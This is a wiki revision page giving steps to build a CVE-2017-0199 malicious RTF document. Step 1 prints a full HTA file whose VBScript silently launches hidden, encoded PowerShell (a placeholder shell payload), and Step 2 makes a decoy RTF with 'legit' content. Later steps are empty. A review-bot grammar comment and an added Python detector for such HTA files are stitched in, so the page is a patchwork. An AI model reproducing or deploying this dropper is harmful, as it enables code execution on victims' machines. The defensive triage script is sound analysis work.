CVE-2017-0199 Malicious RTF Document: Difference between revisions
From ICO wiki
Created page with "==CVE-2017-0199 Malicious RTF Document== ===Step 1 === Prepare an HTA file: (HTA file are HTML application which can run JScript and VBscript) Let's call it "ms.hta" <pre> <..." |
|||
| Line 33: | Line 33: | ||
</pre> | </pre> | ||
===Step 2 === | ===Step 2 === | ||
Create a simple RTF document using Winword with the any random content. (in our example the string "This is my official and legit content") | |||
Call it "ms.rtf" | |||
===Step 3 === | ===Step 3 === | ||
===Step 4 === | ===Step 4 === | ||
===Step 5 === | ===Step 5 === | ||
===Step 6 === | ===Step 6 === | ||
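Review bot: the line added under Step 2 has a stray article in "with the any random content", and its parenthetical opens in lowercase after a full stop. Suggest: Create a simple RTF document using Winword with any random content (in our example, the string "This is my official and legit content"). The second added line, Call it "ms.rtf", is also missing its closing punctuation.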
Revision as of 20:33, 2 May 2017
CVE-2017-0199 Malicious RTF Document
Step 1
Prepare an HTA file (HTA files are HTML applications that can run JScript and VBScript). Let's call it "ms.hta":
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>Bonjour</title>
<script language="VBScript">
Set owFrClN0giJ = CreateObject("Wscript.Shell")
Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject")
If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
owFrClN0giJ.Run "powershell.exe -nop -w hidden -e ENCODED_B64_SHELL"
End If
</script>
<hta:application
id="oHTA"
applicationname="Bonjour"
application="yes"
>
</hta:application>
</head>
<div>
<object type="text/html" data="http://windows.microsoft.com/en-IN/windows7/products/features/windows-defender" width="100%" height="100%">
</object></div>
<body>
</body>
</html>
Step 2
Create a simple RTF document using Winword with any random content (in our example, the string "This is my official and legit content").
Call it "ms.rtf".
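For triage of a captured file that resembles the Step 1 HTA, the following added example (not part of the original wiki page) flags the markers visible in that sample and decodes any PowerShell -EncodedCommand payload for analyst review. The function name triage_hta, the indicator names and both sample inputs are constructed for illustration.

```python
import base64
import re

# Constructed samples: one modelled on the Step 1 HTA (payload decodes to a harmless command), one benign.
SAMPLE_HTA = b'''<html><head>
<script language="VBScript">
Set sh = CreateObject("Wscript.Shell")
sh.Run "powershell.exe -nop -w hidden -e dwBoAG8AYQBtAGkA"
</script>
<hta:application id="oHTA" applicationname="Bonjour">
</hta:application></head><body></body></html>'''
BENIGN_HTA = b'<html><head><hta:application id="app" applicationname="Inventory"></hta:application></head><body>ok</body></html>'

# Markers seen in the Step 1 sample: HTA tag, script block, shell object, hidden and encoded PowerShell.
_PS = rb"powershell(?:\.exe)?\b[^\r\n]*?"
INDICATORS = {
    "hta_application_tag": re.compile(rb"<hta:application\b", re.I),
    "script_block": re.compile(rb"<script[^>]*\blanguage\s*=\s*[\"']?(?:vbscript|jscript)", re.I),
    "wscript_shell": re.compile(rb"CreateObject\s*\(\s*\"WScript\.Shell\"", re.I),
    "ps_hidden_window": re.compile(_PS + rb"\s-w(?:indowstyle)?\s+hidden\b", re.I),
    "ps_encoded_command": re.compile(_PS + rb"\s-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]{8,})", re.I),
}

def triage_hta(data: bytes) -> dict:
    """Return matched indicators, decoded -EncodedCommand payloads and a verdict."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(data))
    decoded = []
    for m in INDICATORS["ps_encoded_command"].finditer(data):
        try:
            # PowerShell expects Base64 over UTF-16LE text.
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-16-le"))
        except ValueError:  # bad Base64 or not UTF-16LE: keep the raw token for the analyst
            decoded.append(m.group(1).decode("ascii"))
    # A script that creates a shell object and launches PowerShell is the pattern to escalate.
    runs_shell = "wscript_shell" in hits and any(h.startswith("ps_") for h in hits)
    return {"indicators": hits, "decoded_commands": decoded, "suspicious": runs_shell}

if __name__ == "__main__":
    print(triage_hta(SAMPLE_HTA))
```

The window-style and encoded-command patterns cover the short forms used in the Step 1 sample; PowerShell accepts other parameter abbreviations, so treat a miss as inconclusive rather than clean.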